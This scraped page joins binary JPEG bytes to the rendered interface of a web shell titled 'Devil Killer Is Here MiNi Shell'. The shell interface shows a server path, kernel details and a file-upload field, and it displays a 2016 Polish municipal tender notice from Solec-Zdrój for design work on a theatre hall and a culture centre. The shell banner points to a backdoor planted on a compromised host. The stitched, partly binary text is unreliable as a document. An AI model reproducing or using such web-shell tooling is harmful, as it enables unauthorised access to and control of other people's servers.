JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160321/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160321/63076-N-2016.html

<p class="kh_header"><b>Solec-Zdrój: Wykonanie dokumentacji projektowej oraz sprawowanie nadzoru autorskiego dla zadania /Poszerzenie oferty kulturalnej na terenie gminy Solec-Zdrój skierowanej do mieszkańców, turystów oraz kuracjuszy/</b><br>
<b>Numer ogłoszenia: 63076 - 2016; data zamieszczenia: 21.03.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Solec - Zdrój , ul. 1 Maja 10, 28-131 Solec-Zdrój, woj. świętokrzyskie, tel. 041 377-60-39, faks 041 3776022.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.solec-zdroj.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowej oraz sprawowanie nadzoru autorskiego dla zadania /Poszerzenie oferty kulturalnej na terenie gminy Solec-Zdrój skierowanej do mieszkańców, turystów oraz kuracjuszy/.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest Wykonanie dokumentacji projektowej oraz sprawowanie nadzoru autorskiego dla zadania /Poszerzenie oferty kulturalnej na terenie gminy Solec-Zdrój skierowanej do mieszkańców, turystów oraz kuracjuszy/.
2. Całość zamówienia podzielono na 2 części:
2.1. Cześć I zamówienia - Opracowanie dokumentacji projektowej na przebudowę sali sportowej na salę widowiskową wraz z późniejszym sprawowaniem nadzoru autorskiego.
Zakres zamówienia obejmuje m.in.:
a) Opracowanie dokumentacji projektowej  wraz z opisem przedmiotu zamówienia na realizację prac polegających na przebudowie istniejącej sali gimnastycznej przy szkole podstawowej w Solcu-Zdroju  na salę widowiskową.
W ramach inwestycji powstanie:
-sala widowiskowa wielofunkcyjna ze sceną teatralną, w pełni wyposażoną do organizowania imprez teatralnych z częścią stałą i ruchomą oraz widownia mogąca pomieścić około 240 osób siedzących, 
w tym część parterowa mieszcząca około 150 miejsc o powierzchni około 310m2 oraz  antresola mieszcząca około 90 miejsc o powierzchni około 100m2
- antresola z miejscami do siedzenia w układzie teatralnym, 
- wejście do budynku z węzłem sanitarnym dla niepełnosprawnych oraz szatnią
- toalety dla klientów z komunikacją,
- w ramach inwestycji zostanie wydzielona klatka schodowa umożliwiająca komunikację pomiędzy kondygnacjami,
- pomieszczenia techniczne i socjalne,
- pomieszczenia do obsługi imprez -zaplecze techniczne do obsługi nagłośnienia i oświetlenia,
- w ramach inwestycji planowana jest adaptacja poddasza na cele wentylacji i pomieszczeń technicznych,
- łącznik z sali widowiskowej do położonego obok budynku Hali sportowej,
- obiekt sali widowiskowej zostanie wyposażony w instalacje co, cwu, wod-kan, elektryczną i teletechniczną, wentylacji i klimatyzacji,
- specyfikacja nagłośnienia i oświetlenia dla dodatkowej sceny mobilnej planowanej do zakupu w celach organizacji imprez plenerowych.
Obiekt ma być w pełni dostosowany do potrzeb osób niepełnosprawnych. Wejście do obiektu musi znajdować się na poziomie terenu. Szerokość przejść wnętrza budynku ma zapewniać dostęp osobom niepełnosprawnym do obiektu. Dokumentacja zawierać będzie również projekt zagospodarowania terenu.
b) Sprawowanie nadzoru autorskiego zgodnie z ustawą Prawo Budowlane oraz udzielanie odpowiedzi na pytania kierowane przez Zamawiającego lub Wykonawców robót związane z dokumentacją projektową. Nadzór autorski w trakcie realizacji robót budowlanych obejmuje 15 pobytów projektanta na inwestycji. W przypadku gdy w trakcie prowadzenia robót nie będzie takiej potrzeby ilość  pobytów może być się mniejsza iż zakładane 15.
2.2. Część II zamówienia - Opracowanie dokumentacji projektowej na rozbudowę budynku Gminnego Centrum Kultury przy ul. Partyzantów w Solcu-Zdroju wraz z późniejszym sprawowaniem nadzoru autorskiego.
Zakres zamówienia obejmuje m.in.:
a) Opracowanie dokumentacji projektowej  wraz z opisem przedmiotu zamówienia na realizację prac dla rozbudowy budynku GCK przy ul. Partyzantów na potrzeby działalności GCK poprzez przebudowę budynku sąsiadującego znajdującego się w stanie surowym.
Projektowany budynek powinien posiadać 3 kondygnacje oraz około 400m2 powierzchni użytkowej.
Zakres prac projektowych:
W budynku należy zaprojektować niezbędne prace remontowo - adaptacyjne mające na celu przystosowanie budynku do pełnienia funkcji kulturalnych. 
Zakres dokumentacji  obejmuje także projekty aranżacji  pomieszczeń i wyposażenia
Przeznaczenie budynku:
1 kondygnacja - biblioteka publiczna wraz z systemem zarządzania zbiorami,
2 kondygnacja - sala wystawiennicza. Ponadto sala wystawiennicza powinna umożliwiać prowadzenie konferencji, być wyposażona w odpowiedni sprzęt multimedialny (m.in. rzutnik, ekran chowany w suficie, nagłośnienie),
3 kondygnacja - pomieszczenia na potrzeby działalności GCK w tym sala ćwiczeń zespołów muzycznych z odpowiednim wyciszeniem, wyposażona w pianino.
Zakres robót adaptacyjnych powinien przewidywać:
- prace rozbiórkowe,
- przebudowę ścian i fundamentów,
- budowę wejścia na poziomie terenu,
- montaż instalacji co, cwu, wod-kan, elektrycznej i teletechnicznej, wentylacji i klimatyzacji,
- zakup i montaż stolarki okiennej i drzwiowej,
- tynkowanie i malowanie ścian,
- wykonanie warstw wyrównawczych i posadzek,
- roboty malarskie wewnętrzne wraz z wyrównaniem podłoży (ściany + sufity),
- wykonanie dachu,
- wykonanie orynnowania,
- dostawa i montaż windy, umożliwiające korzystanie z zarówno części /starej/ jak i /nowej/ budynku GCK,
- ocieplenie ścian zewnętrznych oraz roboty wykończeniowe elewacji,
- zakup wyposażenia obiektu (stoły, szafki, krzesła, sprzęt komputerowy itp.)
Budynek należy przystosować dla potrzeb osób niepełnosprawnych.
Dokumentacja zawierać będzie również projekt zagospodarowania terenu.
b) Sprawowanie nadzoru autorskiego zgodnie z ustawą Prawo Budowlane oraz udzielanie odpowiedzi na pytania kierowane przez Zamawiającego lub Wykonawców robót związane z dokumentacją projektową. Nadzór autorski w trakcie realizacji robót budowlanych obejmuje 15 pobytów projektanta na inwestycji. W przypadku gdy w trakcie prowadzenia robót nie będzie takiej potrzeby ilość  pobytów może być się mniejsza iż zakładane 15.
3. Szczegółowy opis przedmiotu zamówienia zawiera TOM II SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.20.00.00-0, 71.21.00.00-3, 71.22.00.00-6, 71.22.10.00-3, 71.24.20.00-6, 71.24.50.00-7, 71.24.60.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Oferta winna być zabezpieczona wadium wniesionym do dnia 30.03.2016r. do godz. 9:00, odpowiednio dla: 
Części 1 - 2 000,00 zł (słownie: dwa tysiące zł)
Części 2 - 2 000,00 zł (słownie: dwa tysiące zł)
Zamawiający zaleca, aby wadium zostało wniesione na każdą cześć osobno. 
Jeżeli wadium zostanie wniesione łącznie na kilka części jednym przelewem lub dokumentem wadialnym; z treści przelewu lub dokumentu wadialnego musi jednoznacznie wynikać na które części przedmiotu zamówienia i w jakiej kwocie wadium zostało wniesione. W przypadku jakichkolwiek wątpliwości co do właściwego opisu przelewu lub dokumentu wadialnego przy jednorazowym złożeniu wadium na kilka części Zamawiający uzna wniesienie wadium za nieskuteczne i wykluczy wykonawcę z postępowania.
2. Wadium może być wnoszone w jednej lub kilku następujących formach:
- pieniądzu;
- w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, 
z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
- gwarancjach bankowych;
- gwarancjach ubezpieczeniowych;
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy 
z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity Dz.U. z 2007r. Nr 42, poz. 275 z późn. zm.).
3. Wadium wnoszone w pieniądzu należy złożyć przelewem bankowym na poniżej podany rachunek bankowy: 
Gmina  Solec - Zdrój
Nadwiślański Bank Spółdzielczy w Solcu - Zdroju
nr rachunku : 66 85170007 0000000003900013 
z dopiskiem: wadium na zadanie /Wykonanie dokumentacji projektowej dla ________ / (sali widowiskowej lub/i budynku GCK)
Zamawiający będzie uważał za skuteczne wniesienie wadium tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew do dnia 30.03.2016r. do godz. 9:00. 
W przypadku złożenia wadium w formie pieniężnej zaleca się  aby Wykonawca złożył kopię dokonanego polecenia przelewu, na którym znajdować się będzie stempel potwierdzający dokonanie przelewu. W przypadku złożenia wadium w formie innej niż pieniądza, oryginał wniesienia wadium musi zostać złożony z ofertą, przy czym oryginał może zostać złożony w oddzielnej kopercie. Jeżeli Wykonawca będzie żądał zwrotu oryginału wniesienia wadium po zakończeniu postępowania zobowiązany jest w takim przypadku do złożenia z ofertą jego kserokopii potwierdzonej za zgodność z oryginałem.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej:
Dla części I i/lub części II
- jeden projekt budowlany budynku użyteczności publicznej o powierzchni użytkowej co najmniej 300 m2.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie formułuje szczegółowego opisu sposobu dokonywania oceny spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla części I i/lub części II
Wykonawca musi dysponować osobami zdolnymi do wykonania zamówienia posiadającymi wymagane prawem uprawnienia tj:
- co najmniej 1 projektanta posiadającego uprawnienia do projektowania bez ograniczeń w specjalności architektonicznej, a także posiadającego  minimum 5 letnia praktykę zawodową.
- co najmniej 1 projektanta posiadającego uprawnienia do projektowania bez ograniczeń w specjalności konstrukcyjno-budowlanej, a także posiadającego  minimum 3 letnia praktykę zawodową,
-  co najmniej 1 projektanta posiadającego uprawnienia do projektowania  bez ograniczeń w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych, a także posiadającego minimum 3 letnia praktykę  zawodową,
- co najmniej 1 projektanta posiadającego uprawnienia do projektowania bez ograniczeń w specjalności sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, a także posiadającego  minimum 3 letnia praktykę zawodową.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie formułuje szczegółowego opisu sposobu dokonywania oceny spełnienia tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty wskazane przez Zamawiającego w ust. 2 rozdziału XII SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Termin realizacji dokumentacji projektowej - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany mogą dotyczyć: a) zmiany terminu/ów realizacji przedmiotu umowy, poprzez jego skrócenie w przypadku zgodnej woli Stron, lub poprzez jego przedłużenie ze względu na przyczyny leżące po stronie Zamawiającego dotyczące w szczególności braku udostępnienia Wykonawcy materiałów, czy informacji bądź podjęcia decyzji zależnych od Zamawiającego, a niezbędnych do realizacji przedmiotu umowy, oraz inne niezawinione przez Strony przyczyny spowodowane przez siłę wyższą, oraz w przypadku zaistnienia okoliczności niezależnych od Stron i niezawinionych przez Wykonawcę, a związanych z opóźnieniem w uzyskaniu od stosownych instytucji i organów niezbędnych uzgodnień, pozwoleń, decyzji itp., w terminach instrukcyjnych bądź obligatoryjnych wynikających z obowiązujących przepisów prawa. Ewentualne przedłużenie terminu winno zostać poprzedzone przygotowaniem stosownego protokołu konieczności i udokumentowaniem zaistnienia okoliczności wpływających na konieczność zmiany terminów, b) zmiany wysokości wynagrodzenia wykonawcy w przypadku ustawowej zmiany stawki podatku od towarów i usług V A T odpowiednio dla zakresu wykonanych usług stanowiących przedmiot umowy, które zostały zrealizowane po dniu wejścia w życie przepisów dokonujących zmiany stawki podatku VAT, c) zmiany wysokości wynagrodzenia wykonawcy w przypadku ustawowej zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3 - 5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę (Dz. U. 2002 Nr 200 poz. 1679 z późno zm.) wpływającej na wysokość wynagrodzenia Wykonawcy, którego wypłata nastąpiła po dniu wejścia w życie przepisów dokonujących zmiany wysokości minimalnego wynagrodzeniu za pracę, d) zmiany wysokości wynagrodzenia wykonawcy w przypadku ustawowej zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne ustalonych na podstawie przepisów ustawy z dnia 13 października 1998 r. o systemie ubezpieczeń społecznych (t. j. Dz. U. 2013 poz. 1442 z późno zm.) oraz ustawy z dnia 27 sierpnia 2004 r. o świadczeniach opieki zdrowotnej finansowanych ze środków publicznych (t. j. Dz. U. 2008 Nr 164 poz. 1027 z późno zm.) wpływającej na wysokość wynagrodzenia Wykonawcy, którego wypłata nastąpiła po dniu wejścia w życie przepisów dokonujących zmian ww. zasad lub wysokości stawek składek, e) zmiany osób przeznaczonych do realizacji umowy ze względów losowych, f) zmiany podwykonawcy ze względów losowych, o ile zostali przewidziani, g) innych zmian korzystnych dla Zamawiającego, h) innych zmian, o ile konieczność ich wprowadzenia będzie wynikała ze zmian w obowiązujących przepisach prawa.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.solec-zdroj.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego - ul. 1 Maja 10, 28 - 131 Solec - Zdrój, pok. 12 - zgodnie z zapisami rozdziału IX SIWZ.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.03.2016 godzina 09:00, miejsce: Urząd Gminy w Solcu - Zdroju, ul. 1 Maja 10, 28 - 131 Solec - Zdrój w Biurze Obsługi Interesanta na parterze budynku.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest przewidziane do realizacji  w ramach RPOWŚ na lata 2014-2020 z udziałem środków z EFRR.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie dokumentacji projektowej na przebudowę sali sportowej na salę widowiskową wraz z późniejszym sprawowaniem nadzoru autorskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje m.in.:
a) Opracowanie dokumentacji projektowej  wraz z opisem przedmiotu zamówienia na realizację prac polegających na przebudowie istniejącej sali gimnastycznej przy szkole podstawowej w Solcu-Zdroju  na salę widowiskową.
W ramach inwestycji powstanie:
-sala widowiskowa wielofunkcyjna ze sceną teatralną, w pełni wyposażoną do organizowania imprez teatralnych z częścią stałą i ruchomą oraz widownia mogąca pomieścić około 240 osób siedzących, 
w tym część parterowa mieszcząca około 150 miejsc o powierzchni około 310m2 oraz  antresola mieszcząca około 90 miejsc o powierzchni około 100m2
- antresola z miejscami do siedzenia w układzie teatralnym, 
- wejście do budynku z węzłem sanitarnym dla niepełnosprawnych oraz szatnią
- toalety dla klientów z komunikacją,
- w ramach inwestycji zostanie wydzielona klatka schodowa umożliwiająca komunikację pomiędzy kondygnacjami,
- pomieszczenia techniczne i socjalne,
- pomieszczenia do obsługi imprez -zaplecze techniczne do obsługi nagłośnienia i oświetlenia,
- w ramach inwestycji planowana jest adaptacja poddasza na cele wentylacji i pomieszczeń technicznych,
- łącznik z sali widowiskowej do położonego obok budynku Hali sportowej,
- obiekt sali widowiskowej zostanie wyposażony w instalacje co, cwu, wod-kan, elektryczną i teletechniczną, wentylacji i klimatyzacji,
- specyfikacja nagłośnienia i oświetlenia dla dodatkowej sceny mobilnej planowanej do zakupu w celach organizacji imprez plenerowych.
Obiekt ma być w pełni dostosowany do potrzeb osób niepełnosprawnych. Wejście do obiektu musi znajdować się na poziomie terenu. Szerokość przejść wnętrza budynku ma zapewniać dostęp osobom niepełnosprawnym do obiektu. Dokumentacja zawierać będzie również projekt zagospodarowania terenu.
b) Sprawowanie nadzoru autorskiego zgodnie z ustawą Prawo Budowlane oraz udzielanie odpowiedzi na pytania kierowane przez Zamawiającego lub Wykonawców robót związane z dokumentacją projektową. Nadzór autorski w trakcie realizacji robót budowlanych obejmuje 15 pobytów projektanta na inwestycji. W przypadku gdy w trakcie prowadzenia robót nie będzie takiej potrzeby ilość  pobytów może być się mniejsza iż zakładane 15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.20.00.00-0, 71.21.00.00-3, 71.22.00.00-6, 71.22.10.00-3, 71.24.20.00-6, 71.24.50.00-7, 71.24.60.00-4.</p></li>
